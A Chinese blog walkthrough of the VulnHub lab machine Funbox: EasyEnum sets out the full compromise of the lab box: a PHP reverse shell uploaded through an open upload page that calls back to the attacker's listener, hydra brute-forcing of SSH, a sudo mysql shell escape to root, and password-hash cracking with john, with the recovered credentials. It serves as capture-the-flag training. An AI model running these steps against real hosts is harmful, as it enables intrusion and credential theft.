vulnhub Funbox: EasyEnum(funbox7)

最新推荐文章于 2024-02-13 09:23:39 发布
最新推荐文章于 2024-02-13 09:23:39 发布
阅读量4.3k 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: gobuster php反弹shell hydra john mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/124081161
版权

渗透思路:

nmap扫描----gobuster扫描(带-x参数)----上传php反弹shell----hydra暴力破解goat用户密码----sudo mysql提权

环境信息:

靶机:192.168.101.55

攻击机:192.168.101.34

官网提示:

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.55

扫描到22端口(ssh)和80端口(http)

2、gobuster扫描

浏览器访问http://192.168.101.55/发现是apache2 ubuntu默认页面

gobuster扫描一下网站目录,加个-x php在扫描的时候增加对.php文件的扫描

​gobuster dir -u http://192.168.101.55/ -w /usr/share/wordlists/dirb/big.txt -x php

扫描结果如下图所示。

如果不加-x php,下图中三个带.php后缀的文件是扫不出来的。

3、利用任意文件上传getshell

旁的也就不说了,也没啥用,/secret其实也没啥用,但是有点好玩,似乎是用户名,但是不知道怎么断句啊……而且看起来至少有5个用户名,如果都用hydra爆破,估计要爆破好久

/mini.php看起来有大用,毕竟官网提示中都说了,用"Daisys best friend"收集信息,米老鼠和唐老鸭里面有Daisy和Minnie,虽然不是mini但可能是谐音梗吧。

浏览器访问http://192.168.101.55/mini.php,发现可以上传文件

传个kali自带的php反弹shell上去,原始文件在/usr/share/webshells/php/php-reverse-shell.php,复制该文件,修改文件中的$ip和$port为攻击机ip和攻击机监听端口

修改好之后上传,上传成功后,文件会出现在列表中,并且从网页提示可以知道文件被上传到/var/www/html/目录下了

攻击机监听443端口

nc -nlvp 443

然后浏览器访问http://192.168.101.55/php-reverse.php,其中php-reverse.php是刚刚上传的php反弹shell文件

攻击机上得到www-data用户的shell

4、hydra暴力破解goat的ssh密码

进入/home/目录一看,有5个用户,有4个和http://192.168.101.55/secret/显示的结果是对的上的,但……这也没什么关系啦,反正http://192.168.101.55/secret/就是个烟雾弹。

根据官网提示,先去karla用户家目录下看看,有一个read.me文件,打开看看发现提示说karla和这个CTF没啥关系。

再看看其他用户家目录,别的用户倒是没什么有价值的东西,goat用户家目录下有个shadow.bak,不过只有root用户和root组能看……emmmm不过比起其他用户,表面上看起来goat已经是和root关系最密切的了。

碰碰运气,hydra爆破一下goat用户的ssh密码,根据官网提示用rockyou.txt字典(rockyou.txt来自/usr/share/wordlists/rockyou.txt.gz)

hydra -l goat -P "rockyou.txt" ssh://192.168.101.55

得到goat的ssh密码是thebest

5、sudo mysql提权

ssh goat@192.168.101.55

goat用户用密码thebest登录靶机后,查看是否可以执行sudo命令

sudo -l

发现goat可以以root身份执行mysql命令

gtfobins上查到mysql可以sudo提权:mysql | GTFOBins

执行命令

sudo mysql -e '\! /bin/sh'

得到root权限

/root/目录下获得flag

到处玩玩

在靶机上到处找找,还找到了harry和oracle用户的密码,但是这两个用户对于提权没啥用处,而且不能ssh登录,不知道是不是就是这个靶机的兔子洞。

(1)mysql中获取harry用户密码

进入mysql数据库

sudo mysql

查看所有数据库

show databases;

进入db1数据库

use db1

查看数据库中所有表

show tables;

查看users表的所有内容

select * from users;

发现了harry用户的md5加密的密码

拿到在线网站md5在线解密破解,md5解密加密解密,发现密码是123456

harry用户不能ssh登录,只能从goat切换。

su harry

然后输入密码123456

切换到harry之后发现harry没啥特殊才能……emmmmm

(2)john暴力破解oracle用户密码hash

查看/etc/passwd文件,发现oracle用户的密码是直接写在/etc/passwd中的,并且还是MD5加密的

把oracle用户这行拷贝到攻击机本地文件中,如果用echo命令写入文件的话,记得转义$和\

echo "oracle:\$1$|O@GOeN\\\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash" > oracle.txt

用john暴力破解oracle用户的密码hash,发现密码明文是hiphop

john oracle.txt

oracle用户也不能ssh登录,只能su命令切换到oracle用户啦

su oracle

仙女象
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub:FUNBOX-EASYENUM靶机
logan_logan的博客
06-06 279
1.浏览器输入目标靶机IP地址浏览网页 2.端口扫描 nmap -p- 192.168.31.128 nmap -sC -sV -p 22,80 192.168.31.128 3.目录枚举 目录枚举的时候找到了一个有意思的mini.php目录 gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt 4.在浏览器打开min
funbox:测试和工具程序
02-11
7. **版本控制**:开发过程中,版本控制系统如Git可能会被用来管理代码的版本,便于多人协作和回溯代码历史。 8. **构建系统**:为了自动化编译和构建过程,项目可能使用Makefile或其他构建工具(如CMake),使得...
VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM
LYJ20010728的博客
08-27 331
VulnHub渗透测试实战靶场 - FUNBOX: EASYENUM题目描述环境下载FUNBOX: EASYENUM靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Boot2root in 6 steps for script-kiddies. Timeframe to root this box: 20 mins to never ever. It's on you. HINTS: Enum without sense, costs you too many time: 1.Use
VulnHub靶场之Funbox: EasyEnum
A_dmin的博客
10-05 899
VulnHub靶场之Funbox: EasyEnum 扫描ip: 端口: 访问80端口,默认页面,扫描一下目录: 访问phpmyadmin,发现需要密码,,访问mini.php发现可以直接上传文件,上传shell,获取到www权限: 查看用户存在5个用户,,,看了主页的hint,进行ssh爆破: 得到一个ssh用户密码:goat/thebest: 访问,sudo -l查看一下: 进入数据查看一下,发现另一个用户的账号密码:harry/123456: 切换一下,好像还是没有什么,,,cat一下
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox7( EASYENUM
Aluxian_的博客
09-15 661
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第七个靶机了 这个靶机比较简单1.信息收集 获取ip地址 和端口信息 进行扫描dirsearch和gobuster工具的使用2.网站渗透 发现文件上传漏洞,上传木马 运行木马nc进行回弹 获取shell3.最后是mysql提权 的学习 和sudo提权一样。
PG::FunboxEasyEnum
aya3t的博客
11-28 488
PROVING GROUNDS::FunboxEasyEnum
vulnhub Funbox: Easy (funbox3)
箭雨镜屋
07-09 682
渗透思路:nmap扫描----gobuster扫描网站目录----登录store(弱密码/sql注入)----利用文件上传漏洞获得反弹shell----sudo pkexec提权
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
php-reverse-shell
07-24
php-reverse-shell
中兴funbox固件b18版本
07-12
中兴funbox固件,b18,android 4.4
FunBox.zip_melody
09-24
FunBox ASM codes for door bell with melody
funbox界面需求文档-20160414.docm
05-08
funbox界面需求文档-20160414.docm
靶机渗透练习28-Funbox7-EasyEnum
hirak0的博客
04-18 1113
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-easyenum,565/ Description Boot2root in 6 steps for script-kiddies. Timeframe to root this box: 20 mins to never ever. It’s on you. Hints: Enum without sense, costs you too many time: Use “Daisys best friend”
靶机渗透练习24-Funbox3-Easy
hirak0的博客
04-18 663
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-easy,526/ Description Boot2Root ! Easy going, but with this Funbox you have to spend a bit more time. Much more, if you stuck in good traps. But most of the traps have hints, that they are traps. If you nee
vulnhub靶机:FunBox
Keepb1ue的博客
09-28 2977
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 靶机:DC1 (VirtualBox) IP:192.168.56.109 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有也有详细的靶机说明,而FunBox需要寻找的flag总数为1个。 靶机环境配置: 将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。 靶机渗透开始: 先看下手里的
Web 扫描神器:Gobuster 保姆级教程(附链接)
最新发布
Flag少侠的博客
02-13 3244
Web 扫描神器:Gobuster 保姆级教程(附链接)
FUNBOX: UNDER CONSTRUCTION!
08-16
FUNBOX: UNDER CONSTRUCTION! 是一个面向初学者的基础级 BootToRoot 机器,难度较低。它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在查看cron.sh文件时,可以进行base64解码,然后切换到root用户并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [vulnhub刷题记录(FUNBOX: UNDER CONSTRUCTION!)](https://blog.csdn.net/admin_gt/article/details/126722192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [vulnhub--Funbox: Under Construction!](https://blog.csdn.net/qq_39991837/article/details/119374087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值